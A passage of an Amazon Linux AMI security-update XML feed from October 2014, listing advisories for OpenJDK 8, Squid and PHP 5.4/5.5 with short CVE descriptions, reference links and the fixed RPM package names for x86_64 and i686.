arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.71-2.5.3.1.49.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.71-2.5.3.1.49.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.71-2.5.3.1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-432</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2014-432: important priority package update for java-1.8.0-openjdk</title><issued date="2014-10-16 22:16:00" /><updated date="2014-10-16 22:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6562:
It was discovered that the Libraries component in OpenJDK failed to properly handle ZIP archives that contain entries with a NUL byte used in the file names. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2014-6558:
It was discovered that the CipherInputStream class implementation in OpenJDK did not properly handle certain exceptions. This could possibly allow an attacker to affect the integrity of an encrypted stream handled by this class.
CVE-2014-6531:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6519:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6517:
It was discovered that the StAX XML parser in the JAXP component in OpenJDK performed expansion of external parameter entities even when external entity substitution was disabled. A remote attacker could use this flaw to perform an XML eXternal Entity (XXE) attack against applications using the StAX parser to parse untrusted XML documents.
CVE-2014-6512:
It was discovered that the DatagramSocket implementation in OpenJDK failed to perform source address checks for packets received on a connected socket. A remote attacker could use this flaw to have their packets processed as if they were received from the expected source.
CVE-2014-6511:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6506:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6504:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6502:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6468:
It was discovered that the Hotspot component in OpenJDK failed to properly handle malformed Shared Archive files. A local attacker able to modify a Shared Archive file used by a virtual machine of a different user could possibly use this flaw to escalate their privileges.
CVE-2014-6457:
It was discovered that the TLS/SSL implementation in the JSSE component in OpenJDK failed to properly verify the server identity during the renegotiation following session resumption, making it possible for malicious TLS/SSL servers to perform a Triple Handshake attack against clients using JSSE and client certificate authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6457" title="" id="CVE-2014-6457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6468" title="" id="CVE-2014-6468" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6502" title="" id="CVE-2014-6502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6504" title="" id="CVE-2014-6504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6506" title="" id="CVE-2014-6506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6511" title="" id="CVE-2014-6511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6512" title="" id="CVE-2014-6512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6517" title="" id="CVE-2014-6517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6519" title="" id="CVE-2014-6519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6531" title="" id="CVE-2014-6531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6558" title="" id="CVE-2014-6558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6562" title="" id="CVE-2014-6562" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1636.html" title="" id="RHSA-2014:1636" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.25-0.b18.4.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.25-0.b18.4.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" 
version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.25" release="0.b18.4.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.25-0.b18.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-433</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-433: important priority package update for squid</title><issued date="2014-10-22 20:04:00" /><updated date="2014-10-22 13:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3609:
A flaw was found in the way Squid handled malformed HTTP Range headers. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
CVE-2014-0128:
A denial of service flaw was found in the way Squid processed certain HTTPS requests when the SSL Bump feature was enabled. A remote attacker could send specially crafted requests that could cause Squid to crash.
CVE-2013-4115:
A buffer overflow flaw was found in Squid's DNS lookup module. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4115" title="" id="CVE-2013-4115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0128" title="" id="CVE-2014-0128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3609" title="" id="CVE-2014-3609" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0597.html" title="" id="RHSA-2014:0597" type="redhat" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1148.html" title="" id="RHSA-2014:1148" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.1.10" release="29.17.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.10-29.17.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="29.17.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.10-29.17.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.10" release="29.17.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.10-29.17.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="29.17.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.10-29.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-434</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-434: important priority package update for php54</title><issued date="2014-10-28 17:09:00" /><updated date="2014-11-01 14:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3670:
1154502:
CVE-2014-3670 php: heap corruption issue in exif_thumbnail()
CVE-2014-3669:
1154500:
CVE-2014-3669 php: integer overflow in unserialize()
CVE-2014-3668:
1154503:
CVE-2014-3668 php: xmlrpc ISO8601 date format parsing out-of-bounds read in mkgmtime()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3668" title="" id="CVE-2014-3668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669" title="" id="CVE-2014-3669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670" title="" id="CVE-2014-3670" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-fpm" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package 
name="php54-pgsql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.34" release="1.62.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-devel-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.34" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.34-1.62.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.34-1.62.amzn1.i686.rpm</filename></package><package 
name="php54" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.34" 
release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.34" 
release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.34-1.62.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.34" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.34-1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-435</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-435: important priority package update for php55</title><issued date="2014-10-28 17:10:00" /><updated date="2014-11-01 14:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3670:
1154502:
CVE-2014-3670 php: heap corruption issue in exif_thumbnail()
CVE-2014-3669:
1154500:
CVE-2014-3669 php: integer overflow in unserialize()
CVE-2014-3668:
1154503:
CVE-2014-3668 php: xmlrpc ISO8601 date format parsing out-of-bounds read in mkgmtime()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3668" title="" id="CVE-2014-3668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669" title="" id="CVE-2014-3669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670" title="" id="CVE-2014-3670" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.18" release="1.92.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-cli-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" 
version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.18" release="1.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.18-1.92.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.18" release="1.92.amzn1" epoch="0" 
